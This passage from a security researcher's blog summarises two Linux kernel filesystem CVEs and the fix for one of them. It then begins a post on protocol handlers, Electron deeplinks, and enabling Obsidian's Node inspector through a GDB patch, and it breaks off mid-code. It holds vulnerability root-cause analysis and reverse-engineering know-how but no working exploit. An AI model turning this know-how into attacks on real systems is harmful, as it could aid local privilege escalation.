<p>By calling the <code class="language-plaintext highlighter-rouge">fsconfig</code> syscall, we can set the key and value to a malformed parameter, causing the kernel to invoke the filesystem context’s <code class="language-plaintext highlighter-rouge">.parse_param</code> handler, which eventually reaches the vulnerable function <code class="language-plaintext highlighter-rouge">legacy_parse_param()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_fsconfig(fd, cmd, key, value, aux)
=&gt; vfs_fsconfig_locked(fc, cmd, &amp;param)
  =&gt; vfs_parse_fs_param(fc, param)
    =&gt; fc-&gt;ops-&gt;parse_param(fc, param)
       (legacy_fs_context_ops.parse_param == legacy_parse_param)
</code></pre></div></div>

<p>But what kind of filesystem sets <code class="language-plaintext highlighter-rouge">&amp;legacy_fs_context_ops</code> as its filesystem context operations?</p>

<p>We just need to find a filesystem that <strong>does not implement <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler</strong>. In that case, <code class="language-plaintext highlighter-rouge">alloc_fs_context()</code> will fall back to use the legacy initialization path.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alloc_fs_context()
=&gt; if (fc-&gt;fs_type-&gt;init_fs_context == NULL)
  =&gt; legacy_init_fs_context(fc)
    =&gt; fc-&gt;ops = &amp;legacy_fs_context_ops
</code></pre></div></div>

<h2 id="22-cve-2023-5345-fssmbclient-reset-password-pointer-to-null">2.2. CVE-2023-5345: fs/smb/client: Reset password pointer to NULL</h2>
<blockquote>
  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6e43b8aa7cd3c3af686caf0c2e11819a886d705</p>
</blockquote>

<p>When configuring an SMB filesystem, <code class="language-plaintext highlighter-rouge">smb3_fs_context_parse_param()</code> is called to parse user-provided parameters. However, it forgets to reset <code class="language-plaintext highlighter-rouge">ctx-&gt;password</code> to <code class="language-plaintext highlighter-rouge">NULL</code> after freeing it. As a result, a user can trigger multiple frees on the same pointer.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -1541,6 +1541,7 @@</span> static int smb3_fs_context_parse_param(struct fs_context *fc,
 
  cifs_parse_mount_err:
    kfree_sensitive(ctx-&gt;password);
<span class="gi">+   ctx-&gt;password = NULL;
</span>    return -EINVAL;
 }
</code></pre></div></div>

<p>This function can be reached in the same way as in CVE-2022-0185.</p>

<h1 id="3-summary">3. Summary</h1>

<p>This post just provides a simple overview of the Linux filesystem. The root causes of the two vulnerabilities are relatively straighforward and can be understood by most Linux kernel researchers. Obviously, I think finding them may not be too difficult for AI nowadays 😆.</p>

<p>But what happens when filesystems interact with <strong>namespaces</strong> or other features, or when <strong>multiple filesystems</strong> are layered or combined? Could unexpected issues arise?</p>

<p>I may write a follow-up post to explore the interaction between the filesystem and other subsystems. It is a complex but interesting topic!</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[Recently I explored the filesystem design of Linux and found it is little more complicated than I expected, so I decided to write a post organizing it. This post analyzes the filesystem from a high-level view, skipping detailed implementation. I hope that after reading it, you will understand more about the Linux filesystem.]]></summary></entry><entry><title type="html">Learning Protocol Handler</title><link href="https://u1f383.github.io/web/2026/01/18/learning-protocol-handler.html" rel="alternate" type="text/html" title="Learning Protocol Handler" /><published>2026-01-18T00:00:00+00:00</published><updated>2026-01-18T00:00:00+00:00</updated><id>https://u1f383.github.io/web/2026/01/18/learning-protocol-handler</id><content type="html" xml:base="https://u1f383.github.io/web/2026/01/18/learning-protocol-handler.html"><![CDATA[<h2 id="0-murmur">0. Murmur</h2>

<p>It has been four months since I last wrote a post… pretty long, lol. The reason is not only that I took a longer break after a whole busy year, like playing the game, doing more exercise, and thinking about the meaning of life, but also that I tried to step out of my comfort zone (in every aspect).</p>

<p>At the end of October, I randomly asked Faith (@farazsth98) if he wanted to participate in the first-year <a href="https://www.zeroday.cloud">zeroday.cloud competition</a>, and maybe we could team up to target Ubuntu. I viewed it as a side project to push myself to do more research on the Linux kernel, and I also wanted to know what it’s like to do research with researchers more senior than me. However, I didn’t expect things to turn out like that. It only took us about three weeks – from finding some unused bugs and one exploitable vulnerability to finishing the exploitation – which is crazy and unimaginable. After that, we spent some time optimizing it, and in the end, we successfully archived LPE on latest Ubuntu Server!</p>

<p>This journey sounds great and should have made me even more passionate about security research, right? But after coming back from Landon (zeroday.cloud was held with BHEU, which was in Landon), I felt burned out and had no energy to read code for no reason. I started thinking about why I do security research and what I am actually chasing. The bad feeling lasted for three weeks. During this period, I read blogs (not limited to security) and did some non-heavy work, like organizing notes. In my free time, I spent more time thinking about what I was stuck on. As I read more and thought more, I gradually found my passion back, because I could see the enjoyment of sharing in those posts. They were pure happiness, learning new things, sharing cool techniques and stuff like that, and that was what I had lost.</p>

<p>Now, I still have a big project on Linux kernel research, but I also read blogs and do research in areas that I am not familiar with, just for fun. That’s why there were no post on the blog for months, and why this new post is about web security.</p>

<p>I am neither an expert in web security nor someone with deep research experience in protocol handlers. As a result, I will only provide an overview of protocol handlers along with some of my research notes.</p>

<p>I also want to thank maple (@maple3142) for answering my question and sharing his knowledge!</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>If you click a link that looks like <code class="language-plaintext highlighter-rouge">"XXXX://"</code> – where <code class="language-plaintext highlighter-rouge">XXXX</code> is not a common protocol such as <code class="language-plaintext highlighter-rouge">http</code> and <code class="language-plaintext highlighter-rouge">https</code> – you may see a prompt on the screen asking whether you allow a specific program to open it. For example, if I try to navigate <code class="language-plaintext highlighter-rouge">slack://XXXX</code> in Safari, macOS will ask me: <strong>“do you allow this website to open <code class="language-plaintext highlighter-rouge">Slack</code>”?</strong> The “Slack” here is the specific program I mentioned earlier.</p>

<p><img src="/assets/image-20260117174451735.png" alt="image-20260117174451735" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>The <strong>protocol handler</strong> describes the situation in which user clicks a custom procol link and then operating system attempts to forward the URL request to the corresponding program. On different operating systems, the relationship between a protocol and a program is defined in different ways.</p>

<p>On macOS, this relationship is defined in the file <code class="language-plaintext highlighter-rouge">~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist</code>, which is also the preference file for the domain <code class="language-plaintext highlighter-rouge">com.apple.launchservices.secure</code>. You can easily read it in a human-readable format using the command <code class="language-plaintext highlighter-rouge">defaults read &lt;domain&gt;</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>defaults <span class="nb">read </span>com.apple.LaunchServices/com.apple.launchservices.secure
<span class="o">{</span>
    LSHandlers <span class="o">=</span>     <span class="o">(</span>
                <span class="o">{</span>
            LSHandlerModificationDate <span class="o">=</span> 0<span class="p">;</span>
            LSHandlerPreferredVersions <span class="o">=</span>             <span class="o">{</span>
                LSHandlerRoleAll <span class="o">=</span> <span class="s2">"-"</span><span class="p">;</span>
            <span class="o">}</span><span class="p">;</span>
            LSHandlerRoleAll <span class="o">=</span> <span class="s2">"com.apple.gamecenter.gamecenteruiservice"</span><span class="p">;</span>
            LSHandlerURLScheme <span class="o">=</span> <span class="s2">"itms-gcs"</span><span class="p">;</span>
        <span class="o">}</span>,
        ...
    <span class="o">)</span><span class="p">;</span>
<span class="o">}</span>
</code></pre></div></div>

<p>On Windows, protocol handlers are defined in the registry, with the following format:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HKEY_CLASSES_ROOT\&lt;protocol_name&gt;\shell\open\command
</code></pre></div></div>

<p>In my Windows VM, the handler for <code class="language-plaintext highlighter-rouge">vscode://</code> is <code class="language-plaintext highlighter-rouge">Code.exe</code> as shown in the screenshot below:</p>

<p><img src="/assets/image-20260117180033526.png" alt="image-20260117180033526" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>On Linux, different distributions may use different mechanisms, so here I will take Ubuntu as an example. On Ubuntu, there is another concept called <strong>MIME types (Media Types)</strong>. MIME types are used to identify file types and determine which applications should open them by default. You can use the following commands to find MIME handlers:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># for per-user
grep -ir "MimeType=x-scheme-handler" ~/.local/share/applications/
# for system
grep -ir "MimeType=x-scheme-handler" /usr/share/applications/
</code></pre></div></div>

<p>You will see file content like the following:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MimeType=x-scheme-handler/XXXXX
</code></pre></div></div>

<p>Here, <code class="language-plaintext highlighter-rouge">XXXXX</code> is protocol name. By opening the corresponding configuration file, you can further identify the program and the command format associated with that protocol. For example, the description of the protocol <code class="language-plaintext highlighter-rouge">snap://</code> is defined in <code class="language-plaintext highlighter-rouge">/usr/share/applications/snap-handle-link.desktop</code>. By reading the file, you can know that its handler is program <code class="language-plaintext highlighter-rouge">/usr/bin/snap</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Desktop Entry]
...
Exec=/usr/bin/snap handle-link %U
MimeType=x-scheme-handler/snap;
...
</code></pre></div></div>

<h2 id="2-electron">2. Electron</h2>

<p>As <a href="https://www.electronjs.org/docs/latest/">its documentation</a> described, <strong>Electron</strong> is a framework for building desktop applications using JavaScript, HTML, and CSS, and it embeds <strong>Chromium</strong> and <strong>Node.js</strong> into its binary. By using <strong>Electron</strong>, you only need to maintain one JS codebase to create cross-platform apps that work on Windows, macOS, and Linux!</p>

<p>A diagram from <a href="https://blog.logrocket.com/advanced-electron-js-architecture/">Advanced Electron.js architecture</a> clearly shows the architecture of Electron.</p>

<p><img src="/assets/image-20260117202131871.png" alt="image-20260117202131871" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>The main process (blue one) of Electron is <strong>Node.js</strong>, which provides delevopers with abundant APIs to use. If you have some knowledge of Chrome, I think its role is similar to the browser process, handling those requests that require high privileges from render processes.</p>

<p>The renderer process runs inside <strong>Chromium</strong>, and it is responsible for rendering web pages by parsing HTML and CSS and running Javascript. Since Electron is used to build applications, it can be imagined that each application needs to control how the web pages are rendered and behave.</p>

<p>Electron exposes many JavaScript APIs that allow developers to hook into. When starting an application, a main script will be executed by Node.js (main process) to set up the environment. Later, when Chromium is loaded, the browser context has already been configured with application-specific behaviors.</p>

<p>One of the features Electron supports is <strong>custom protocol handling</strong>. By using the API <a href="https://www.electronjs.org/docs/latest/api/app#appsetasdefaultprotocolclientprotocol-path-args"><code class="language-plaintext highlighter-rouge">app.setAsDefaultProtocolClient()</code></a>, you can register an application as the handler of a specific protocol. For example, if I want to register my application to be the <code class="language-plaintext highlighter-rouge">myapp://</code> protocol handler, I can run the following JS code in the main script:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">app</span><span class="p">.</span><span class="nx">isDefaultProtocolClient</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span>
    <span class="nx">app</span><span class="p">.</span><span class="nx">setAsDefaultProtocolClient</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp</span><span class="dl">'</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On Windows and Linux, you can write code like the following to handle startup requests triggered by a deeplink:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">whenReady</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">argv</span><span class="p">.</span><span class="nx">find</span><span class="p">(</span><span class="nx">arg</span> <span class="o">=&gt;</span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp://</span><span class="dl">'</span><span class="p">))</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// ...</span>
  <span class="p">}</span>
<span class="p">})</span>
</code></pre></div></div>

<p>Instead of handling requests inside the <code class="language-plaintext highlighter-rouge">app.whenReady()</code> callback, on macOS you must define an <code class="language-plaintext highlighter-rouge">'open-url'</code> event handler:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">open-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">url</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="c1">// ...</span>
<span class="p">})</span>
</code></pre></div></div>

<p>If a deeplink is triggered from within the application or from a browser while an existing instance is already running, Electron (which typically allows only a single application process) will first launch a second instance. This second instance sends a <code class="language-plaintext highlighter-rouge">'second-instance'</code> event to the main instance and then exits. As a result, you may need to define a <code class="language-plaintext highlighter-rouge">'second-instance'</code> event handler to handle this scenario.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">second-instance</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">argv</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">argv</span><span class="p">.</span><span class="nx">find</span><span class="p">(</span><span class="nx">arg</span> <span class="o">=&gt;</span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp://</span><span class="dl">'</span><span class="p">))</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// ...</span>
  <span class="p">}</span>
<span class="p">})</span>
</code></pre></div></div>

<h2 id="3-obsidian">3. Obsidian</h2>

<h3 id="31-file-extraction">3.1. File Extraction</h3>

<p><a href="https://obsidian.md">Obsidian</a> is a free note-taking app based on Electron (btw, I’ve used this app to take research notes for two years, so you should give it a try!).</p>

<p>After installation, it registers the <code class="language-plaintext highlighter-rouge">obsidian://</code> protocol handler, which invokes <code class="language-plaintext highlighter-rouge">Obsidian.exe</code> to handle the URL requests.</p>

<p><img src="/assets/image-20260117234251391.png" alt="image-20260117234251391" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>Obsidian is not an open-source project, but you can download its ASAR file from the <a href="https://github.com/obsidianmd/obsidian-releases/releases/tag/v1.11.4">GitHub release</a>. <strong>ASAR (Atom Shell Archive)</strong> is a file format used by Electron to package applications. This file is generated by the <code class="language-plaintext highlighter-rouge">asar</code> Node.js package, and you can use the <code class="language-plaintext highlighter-rouge">extract</code> command to unpack it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx asar extract obsidian-1.11.4.asar out
</code></pre></div></div>

<p>Once the <code class="language-plaintext highlighter-rouge">obsidian-XXXX.asar</code> is extracted, you will find the following files:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ tree -L 1
.
...
├── app.js
..
├── main.js
├── package.json
...
└── worker.js
</code></pre></div></div>

<p>The attribute <code class="language-plaintext highlighter-rouge">"main"</code> in <code class="language-plaintext highlighter-rouge">package.json</code> defines which JS file is executed first. However, <code class="language-plaintext highlighter-rouge">index.js</code> is missing from the extracted directory. Why?</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="err">...</span><span class="w">
    </span><span class="nl">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"index.js"</span><span class="p">,</span><span class="w">
    </span><span class="err">...</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>If you directly install Obsidian from the released <code class="language-plaintext highlighter-rouge">.deb</code> package on Ubuntu (my VM is Ubuntu haha), you’ll find that <code class="language-plaintext highlighter-rouge">/opt/Obsidian/resources</code> contains not only <code class="language-plaintext highlighter-rouge">obsidian.asar</code> but also <code class="language-plaintext highlighter-rouge">app.asar</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span> /opt/Obsidian/resources
...
<span class="nt">-rw-rw-r--</span> 1 root root    86730 Jan 12 22:46 app.asar
...
<span class="nt">-rwxrwxr-x</span> 1 root root 25878062 Jan 12 22:46 obsidian.asar
</code></pre></div></div>

<p>According to the <a href="https://github.com/electron/electron/blob/5bd2938f6af2ef9060772796f02c3ac9c80d5cdb/lib/browser/init.ts#L199">Electron source code</a> and related posts, it appears that the archive named <code class="language-plaintext highlighter-rouge">app.asar</code> is the  one actually loaded. Inside <code class="language-plaintext highlighter-rouge">app.asar</code>, the <code class="language-plaintext highlighter-rouge">package.json</code> file defines <code class="language-plaintext highlighter-rouge">main.js</code> as the main JS script.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="err">...</span><span class="w">
    </span><span class="nl">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"main.js"</span><span class="p">,</span><span class="w">
    </span><span class="err">...</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Its content looks more like what I would expect from the entry point of an Electron application. By reading the code, we can also see that <code class="language-plaintext highlighter-rouge">obsidian.asar</code> is loaded after the first stage of initialization.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">let</span> <span class="nx">asarPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">APP_PATH</span><span class="p">,</span> <span class="dl">'</span><span class="s1">obsidian.asar</span><span class="dl">'</span><span class="p">);</span>

<span class="c1">// [...]</span>

<span class="kd">function</span> <span class="nx">loadApp</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Execute asar content</span>
    <span class="kd">let</span> <span class="nx">main</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">,</span> <span class="dl">'</span><span class="s1">main.js</span><span class="dl">'</span><span class="p">);</span>

    <span class="kd">let</span> <span class="nx">fn</span><span class="p">;</span>
    <span class="k">try</span> <span class="p">{</span>
        <span class="nx">fn</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="nx">main</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="nx">fn</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">fn</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">,</span> <span class="nx">updateEvents</span><span class="p">);</span>
        <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// [...]</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">success</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Loading main app package</span><span class="dl">'</span><span class="p">,</span> <span class="nx">asarPath</span><span class="p">);</span>
    <span class="nx">success</span> <span class="o">=</span> <span class="nx">loadApp</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="32-debugging">3.2. Debugging</h3>

<h3 id="321-runtime-patch">3.2.1. Runtime Patch</h3>

<p>Here I want to share how I debug Obsidian. To be honest, this is also the main reason why I wrote this post. It includes the basic Electron application debugging (which I didn’t know before) and runtime patches to enable Obsidian’s inspector.</p>

<p>Normally, an Electron application supports two ways to debug: <strong>DevTools</strong> and <strong>Inspector</strong>. I believe everyone has used DevTools before, but you may not expect that it is also embedded inside an Electron app.</p>

<p>For Obsidian, you can use the shortcut <code class="language-plaintext highlighter-rouge">option + command + I</code> on macOS or <code class="language-plaintext highlighter-rouge">shift + control + I</code> on Ubuntu to open the DevTools.</p>

<p><img src="/assets/image-20260118112354908.png" alt="image-20260118112354908" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>By opening the <code class="language-plaintext highlighter-rouge">sources</code> tab, you can see which code is executed on this page. You can also set breakpoints and debug it directly.</p>

<p><img src="/assets/image-20260118112733927.png" alt="image-20260118112733927" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>It is straightforward, right? However, this only debugs the current page running in the <strong>renderer process</strong>. What about the main process, which is the <strong>Node.js process</strong>? That is where the second method comes in: <strong>Inspector</strong>.</p>

<p>If we mirror its role into gdb toolchain, Inspector is more like the <code class="language-plaintext highlighter-rouge">gdbserver</code>, allowing us attach and debug a running renderer. A process that is not a renderer can also implement the Inspector protocol to support debugging, and this is exactly what Electron’s Node.js process does. The inspector is not enabled by default, but in most cases you only need to pass <a href="https://www.electronjs.org/docs/latest/tutorial/debugging-main-process">additional parameters</a> to the application to enable it. For example:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># expose inspector port at 9229 (default port)</span>
app <span class="nt">--inspect</span><span class="o">=</span>9229

<span class="c"># break in the first line of code</span>
app <span class="nt">--inspect-brk</span>
</code></pre></div></div>

<p>After that, you can open <code class="language-plaintext highlighter-rouge">chrome://inspect</code> in Chrome and debug the Node.js process.</p>

<p><img src="/assets/image-20260118122235921.png" alt="image-20260118122235921" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>However, when I run <code class="language-plaintext highlighter-rouge">obsidian --inspect</code> or similar commands, no inspector is launched. After some investigation, I suspect that Obsidian either modified Node.js code (or perhaps just set some options, not sure) to disable the Inspector.</p>

<p>I then opened my IDA to reverse the Obsidian ELF. By searching for <code class="language-plaintext highlighter-rouge">"--inspect"</code>, I found that <code class="language-plaintext highlighter-rouge">node::options_parser::DebugOptionsParser::DebugOptionsParser()</code> is responsible for parsing debug-related parameters. By mapping the function to the <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/node_options.cc#L433">Nodejs source code</a>, it clearly shows that this function parses debug arguments, including <code class="language-plaintext highlighter-rouge">--inspect</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DebugOptionsParser</span><span class="o">::</span><span class="n">DebugOptionsParser</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="n">AddOption</span><span class="p">(</span><span class="s">"--inspect"</span><span class="p">,</span>
            <span class="s">"activate inspector on host:port (default: 127.0.0.1:9229)"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">DebugOptions</span><span class="o">::</span><span class="n">inspector_enabled</span><span class="p">,</span> <span class="c1">// offset: 9</span>
            <span class="n">kAllowedInEnvvar</span><span class="p">);</span>
  <span class="n">AddAlias</span><span class="p">(</span><span class="s">"--inspect="</span><span class="p">,</span> <span class="p">{</span> <span class="s">"--inspect-port"</span><span class="p">,</span> <span class="s">"--inspect"</span> <span class="p">});</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>But if you set a breakpoint at <code class="language-plaintext highlighter-rouge">DebugOptions::CheckOptions()</code> and inspect <code class="language-plaintext highlighter-rouge">argv</code>, you will find that <strong><code class="language-plaintext highlighter-rouge">--inspect</code> is missing, which means Obsidian does not pass the parameters to Electron at all!</strong></p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">DebugOptions</span><span class="o">::</span><span class="n">CheckOptions</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&gt;*</span> <span class="n">errors</span><span class="p">,</span>
                                <span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&gt;*</span> <span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>One possible solution is a runtime patch. You can break at <code class="language-plaintext highlighter-rouge">node::inspector::Agent::Start()</code>, which determines whether the Inspector should be started. One of the condition check is that the <code class="language-plaintext highlighter-rouge">options.inspector_enabled</code> flag <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/inspector_agent.cc#L864">must be true</a>. This is the same flag that <code class="language-plaintext highlighter-rouge">--inspect</code> is supposed to set. Here, we can simply set it to <code class="language-plaintext highlighter-rouge">true</code> manually and then continue execution – the Inspector will start successfully!</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">bool</span> <span class="n">Agent</span><span class="o">::</span><span class="n">Start</span><span class="p">(</span><span class="k">const</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&amp;</span> <span class="n">path</span><span class="p">,</span>
                  <span class="k">const</span> <span class="n">DebugOptions</span><span class="o">&amp;</span> <span class="n">options</span><span class="p">,</span>
                  <span class="n">std</span><span class="o">::</span><span class="n">shared_ptr</span><span class="o">&lt;</span><span class="n">ExclusiveAccess</span><span class="o">&lt;</span><span class="n">HostPort</span><span class="o">&gt;&gt;</span> <span class="n">host_port</span><span class="p">,</span>
                  <span class="kt">bool</span> <span class="n">is_main</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">parent_handle_</span> <span class="o">&amp;&amp;</span>
      <span class="p">(</span><span class="o">!</span><span class="n">options</span><span class="p">.</span><span class="n">inspector_enabled</span> <span class="o">||</span> <span class="o">!</span><span class="n">options</span><span class="p">.</span><span class="n">allow_attaching_debugger</span> <span class="o">||</span>
       <span class="o">!</span><span class="n">StartIoThread</span><span class="p">()))</span> <span class="p">{</span>
    <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The following GDB commands are what I used:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>b Agent::Start
set follow-fork-mode parent
r
# hit the breakpoint
set *(char *)($rdx + 9)=1
</code></pre></div></div>

<p>Log out:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
pwndbg&gt; set *(char *)($rdx + 9)=1
pwndbg&gt; c
Continuing.
[New Thread 0x76bd653f36c0 (LWP 44357)]
Debugger listening on ws://127.0.0.1:9229/6f96cdd8-bb69-4f55-b36f-bfffc2eb2ca8
For help, see: https://nodejs.org/en/docs/inspector
2026-01-18 05:27:15 Loading main app package /opt/Obsidian/resources/obsidian.asar
[New Thread 0x76bcd19ff6c0 (LWP 44358)]
...
</code></pre></div></div>

<p>Great! We can now debug the main process!</p>

<p><img src="/assets/image-20260118133123479.png" alt="image-20260118133123479" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>But what if we want to debug the initialization of the main script? Is there any way to pause the Node.js process right at startup? Going back to <code class="language-plaintext highlighter-rouge">DebugOptionsParser::DebugOptionsParser()</code>, we can see another parameter, <code class="language-plaintext highlighter-rouge">--inspect-brk</code>, which sets the <code class="language-plaintext highlighter-rouge">break_first_line</code> flag.</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DebugOptionsParser</span><span class="o">::</span><span class="n">DebugOptionsParser</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="n">AddOption</span><span class="p">(</span><span class="s">"--inspect-brk"</span><span class="p">,</span>
            <span class="s">"activate inspector on host:port and break at start of user script"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">DebugOptions</span><span class="o">::</span><span class="n">break_first_line</span><span class="p">,</span> <span class="c1">// offset: 12</span>
            <span class="n">kAllowedInEnvvar</span><span class="p">);</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">break_first_line</code> flag is used in <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/inspector_agent.cc#L1189"><code class="language-plaintext highlighter-rouge">node::inspector::Agent::WaitForConnectByOptions()</code></a> to determine whether the Inspector should break at the first line and wait for the debugger to attach.</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">bool</span> <span class="n">Agent</span><span class="o">::</span><span class="n">WaitForConnectByOptions</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="kt">bool</span> <span class="n">should_break_first_line</span> <span class="o">=</span> <span class="n">debug_options_</span><span class="p">.</span><span class="n">should_break_first_line</span><span class="p">();</span>
  <span class="c1">// [...]</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">wait_for_connect</span> <span class="o">||</span> <span class="n">should_break_first_line</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Patch the debug options to implement waitForDebuggerOnStart for</span>
    <span class="c1">// the NodeWorker.enable method.</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">should_break_first_line</span><span class="p">)</span> <span class="p">{</span>
